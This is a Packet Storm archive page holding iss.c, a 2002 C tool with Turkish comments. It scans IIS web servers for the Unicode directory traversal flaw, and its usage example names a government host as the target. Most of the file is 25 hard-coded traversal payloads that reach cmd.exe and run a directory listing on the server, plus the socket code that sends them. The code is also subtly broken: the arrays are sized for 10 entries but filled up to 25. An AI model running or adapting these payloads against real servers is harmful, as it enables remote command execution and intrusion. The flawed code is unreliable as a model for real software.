exploit the possibilities

iss.c

iss.c
Posted Sep 25, 2002
Authored by Rammstein

This tool can be used to scan IIS servers for the unicode directory traversal vulnerability.

tags | cgi
systems | unix
MD5 | 9992afec563d973be3af36bcfa97c9f1

iss.c

Change Mirror Download
/* iss web serverlarýnda  Unicode bug'u serverda aratma
*
* Rammstein - admin@xmirc.com - irc.ada.net.tr #root
*
* Rooting Sabotage Forced - www.rooting.cjb.net
*
* Kullaným ./iss www.victim.telekom.gov.tr :)))
*
* gcc de derlemek için ; gcc -o iss iss.c
*
* Bu Programýn kodlarý tamamen bana ait deðildir Gerekli yerlerdeki deðiþikleri
* yapýp en çok bulunan Unicode bug'larý ile fix ledim programa katkýda bulunan
* PcKiLLeR - CiLeK - Cancer-X - Sephiroth ' a tþkler :)
*/

#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>



void main(int argc, char *argv[])
{

char *bulunan;
char tampon[1024];
char mesaj[] = "200";
int toplam=0;
int sayac;
int buldum=0;
char shoptampon[20];
char *tmp[10];
char *hata[10];


int sock;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long giris;
unsigned long duzelt;


tmp[1]="GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[2]="GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[3]="GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[4]="GET /iisadmpwd/..%c0%af../cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[5]="GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[6]="GET /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[7]="GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[8]="GET /scripts/..%255c..%255cwindows/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[9]="GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[10]="GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[11]="GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[12]="GET /samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[13]="GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[14]="GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[15]="GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[16]="GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[17]="GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[18]="GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[19]="GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[20]="GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[21]="GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[22]="GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[23]="GET /..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[24]="GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[25]="GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";

hata[1] = "/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir ";
hata[2] = "/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir ";
hata[3] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir ";
hata[4] = "/iisadmpwd/..%c0%af../cmd.exe?/c+dir ";
hata[5] = "/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir ";
hata[6] = "/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir ";
hata[7] = "/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir ";
hata[8] = "/scripts/..%255c..%255cwindows/system32/cmd.exe?/c+dir ";
hata[9] = "/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir ";
hata[10] = "/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir ";
hata[11] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir ";
hata[12] = "/samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir ";
hata[13] = "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ ";
hata[14] = "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[15] = "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[16] = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[17] = "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[18] = "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[19] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[20] = "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir ";
hata[21] = "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir ";
hata[22] = "/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[23] = "/..%c0%af../winnt/system32/cmd.exe?/c+dir ";
hata[24] = "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ ";
hata[25] = "/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\ ";

if (argc<2)
{
system("clear");
printf("\n\t _ ");
printf("\n\t|_ ._ _ _ | o ");
printf("\n\t|_ | (/_ (_| | | ");
printf("\n\t _| ");
printf("\n\nUnicode Scanner (c) 2002 ");
printf("\nKullanImI : %s www.victim.telekom.gov.tr
\n\n",argv[0]);

exit(0);
}

if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
system("clear");
printf("\n\t _ ");
printf("\n\t|_ ._ _ _ | o ");
printf("\n\t|_ | (/_ (_| | | ");
printf("\n\t _| ");
printf("\n\t Unicode Scanner (c) 2002 ");

giris=inet_addr(argv[1]);

duzelt=ntohl(giris);

sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr,
he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);

if (connect(sock, (struct sockaddr*)&sin,
sizeof(sin))!=0)
{
perror("connect");
}
send(sock, "HEAD / HTTP/1.0\n\n",17,0);

recv(sock, tampon, sizeof(tampon),0);
printf("%s",tampon);
close(sock);
system("clear");
printf("Tarama YapILIyor..\n\n");

while(toplam++ < 8)
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr,
he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin,
sizeof(sin))!=0)
{
perror("connect");
}

for(sayac=0;sayac < 20;sayac++)
{
shoptampon[sayac] = '\0';
}

send(sock, tmp[toplam],strlen(tmp[toplam]),0);
recv(sock, shoptampon, sizeof(shoptampon),0);

bulunan = strstr(shoptampon,mesaj);

if( bulunan != NULL)
{
printf("%s : ",hata[toplam]);
printf(" Okey unicode bug Bulundu bu iþ tamam :\)\n");++buldum;
}
close(sock);
}

if (buldum)
{
printf("\n Tarama isLemi %s web Sitesi icin
bitti.\n", argv[1]);
}
else printf ("\n Uzgunum tarama sonucunda Unicode bugu
bulunamamIstIr...\n\n");

}
Login or Register to add favorites

File Archive:

June 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    35 Files
  • 2
    Jun 2nd
    14 Files
  • 3
    Jun 3rd
    40 Files
  • 4
    Jun 4th
    22 Files
  • 5
    Jun 5th
    1 Files
  • 6
    Jun 6th
    1 Files
  • 7
    Jun 7th
    19 Files
  • 8
    Jun 8th
    14 Files
  • 9
    Jun 9th
    39 Files
  • 10
    Jun 10th
    20 Files
  • 11
    Jun 11th
    22 Files
  • 12
    Jun 12th
    2 Files
  • 13
    Jun 13th
    1 Files
  • 14
    Jun 14th
    32 Files
  • 15
    Jun 15th
    34 Files
  • 16
    Jun 16th
    9 Files
  • 17
    Jun 17th
    33 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close